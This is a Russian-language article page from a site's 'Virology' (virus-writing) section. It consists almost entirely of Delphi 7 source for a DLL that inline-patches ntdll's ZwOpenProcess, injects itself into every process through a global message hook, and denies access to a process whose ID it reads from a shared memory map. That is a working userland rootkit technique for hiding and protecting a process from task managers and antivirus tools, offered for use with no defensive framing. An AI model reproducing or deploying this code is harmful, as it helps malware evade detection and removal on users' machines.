Перехват API функции ZwOpenProcess на Delphi 7 - Вирусология - Delphi - Каталог статей

Среда, 27.02.2019, 20:45 Приветствую вас Гость | Группа "Гости"

Меню сайта
	Главная Файлы Форум Статьи Гостевая Инфо о сайте

Категории раздела

Вирусология [39]

Статьи о вирусах

Системные [0]

Работа с системой

Примеры [44]

Приёмы, функции, процедуры

Ceти [1]

Работа с интернет

Приколы [5]

Пишем шуточные програмки

Остальное [5]

Всё что не вошло

Помощь проекту
	R106276538945 Z160640024212 Яндекс деньги 410011190732605

Недавние темы

FASM Уроки (ripptwenlemi)

(3)

Есть кто живой? (dolphin)

(11)

Возрадим сайт? (Волк-1024)

(5)

Pony 2.0 + Open Source (XSPY)

(1)

ФСБ хочет отслеживать трафик пользователей интернета (XSPY)

(17)

Сканеры без отправки файла разработчикам АВ (XSPY)

(22)

Расчет энтропии (B64D919B)

(3)

Опрос
	Каким антивирусом вы пользуетесь? TrendMicro BitDefender NOD32 Kasperski Другой Microsoft DrWeb Avast Norton Avira Panda AVG Anti-Virus ZoneAlarm McAfee Не пользуюсь! Результаты \| Архив опросов Всего ответов: 762

Главная » Статьи » Delphi » Вирусология

Перехват API функции ZwOpenProcess на Delphi 7

library ZwHOOK; uses windows; type NTStatus = cardinal; far_jmp = packed record push:byte; PProc:pointer; ret:byte; end; OldCode = packed record one:dword; two:word; end; PUnicodeString = ^TUnicodeString; TUnicodeString = packed record Length: Word; MaximumLength: Word; Buffer: PWideChar; end; PObjectAttributes = ^TObjectAttributes; TObjectAttributes = packed record Length: DWORD; RootDirectory: THandle; ObjectName: PUnicodeString; Attributes: DWORD; SecurityDescriptor: Pointer; SecurityQualityOfService: Pointer; end; PClientID = ^TClientID; TClientID = packed record UniqueProcess:cardinal; UniqueThread:cardinal; end; Type USHORT = Word; PWSTR = {$IFDEF USE_DELPHI_TYPES} Windows.LPWSTR {$ELSE} PWideChar {$ENDIF}; HANDLE = {$IFDEF USE_DELPHI_TYPES} Windows.THandle {$ELSE} Longword {$ENDIF}; PHANDLE = {$IFDEF USE_DELPHI_TYPES} Windows.PHandle {$ELSE} ^HANDLE {$ENDIF}; PVOID = Pointer; type PUNICODE_STRING = ^UNICODE_STRING; _UNICODE_STRING = record Length: USHORT; MaximumLength: USHORT; Buffer: PWSTR; end; UNICODE_STRING = _UNICODE_STRING; PCUNICODE_STRING = ^UNICODE_STRING; const STATUS_ACCESS_DENIED = NTStatus($C0000022); Function ZwOpenProcess(phProcess:PDWORD; AccessMask:DWORD; ObjectAttributes:PObjectAttributes; ClientID:PClientID): NTStatus; stdcall; external 'ntdll.dll' name 'ZwOpenProcess'; var PFunc: pointer; OldFunc: OldCode; NewFunc: Far_jmp; b: dword; pid, hnd:DWORD; procedure UnHook; begin WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(Oldcode),b); end; Function TrueZwOpenProcess(phProcess:PDWORD; AccessMask:DWORD;ObjectAttributes:PObjectAttributes; ClientID:PClientID):NTStatus;stdcall; begin WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(Oldcode),b); Result:= ZwOpenProcess(phProcess,AccessMask,ObjectAttributes,ClientID); WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@NewFunc,sizeof(far_jmp),b); end; Function NewZwOpenProcess(phProcess:PDWORD;AccessMask:DWORD;ObjectAttributes:PObjectAttributes; ClientID:PClientID):NTStatus;stdcall; begin if (ClientID<>nil) and (ClientID.UniqueProcess=pid) then begin Result:=STATUS_ACCESS_DENIED; exit; end; Result:= TrueZwOpenProcess(phProcess,AccessMask,ObjectAttributes,ClientID); end; procedure SetHook; begin PFunc:=GetProcAddress(GetModuleHandle('ntdll.dll'),'ZwOpenProcess'); ReadProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(oldcode),b); NewFunc.push:=$68; NewFunc.PProc:=@NewZwOpenProcess; NewFunc.ret:=$C3; WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@NewFunc,sizeof(far_jmp),b); end; function MessageProc(code : integer; wParam : word; lParam : longint) : longint; stdcall; begin CallNextHookEx(0,code,wParam,lParam); end; procedure SetGlobalHookProc(); begin SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0); Sleep(INFINITE) end; procedure SetGlobalHook(); var hMutex: dword; TrId: dword; begin hMutex := CreateMutex(nil, false, '[{AD6A3658-0AB1-4C9D-93BA-44A06707C676}]'); if GetLastError = 0 then CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId) else CloseHandle(hMutex) end; procedure GetPID; var map:THandle; addrmap:PDWORD; begin map:=OpenFileMapping(FILE_MAP_READ,false,'lamecame'); addrmap:=MapViewOfFile(map,FILE_MAP_READ,0,0,8); pid:=addrmap^; UnMapViewOfFile(addrmap); CloseHandle(map); end; procedure DLLEntryPoint(dwReason: DWord); begin case dwReason of DLL_PROCESS_ATTACH: begin GetPID; SetHook; SetGlobalHook; end; DLL_PROCESS_DETACH: begin UnHook; end; end; end; begin DllProc:= @DLLEntryPoint; DLLEntryPoint(DLL_PROCESS_ATTACH); end.
1 2 3 4 5 Категория: Вирусология \| Добавил: dolphin (28.01.2012)
Просмотров: 2877 \| Рейтинг: 5.0/1

Всего комментариев: 0

Профиль

Поиск

Наша кнопка

Статистика
	--> Статистика материалов Файлов: 365 Форум: 1134/8059 Коментариев: 774 Новостей: 28 Статистика пользователей Всего: 386 За неделю: 3 Вчера: 2 Сегодня: 0 Всего онлайн: 1 Гостей: 1 Пользователей: 0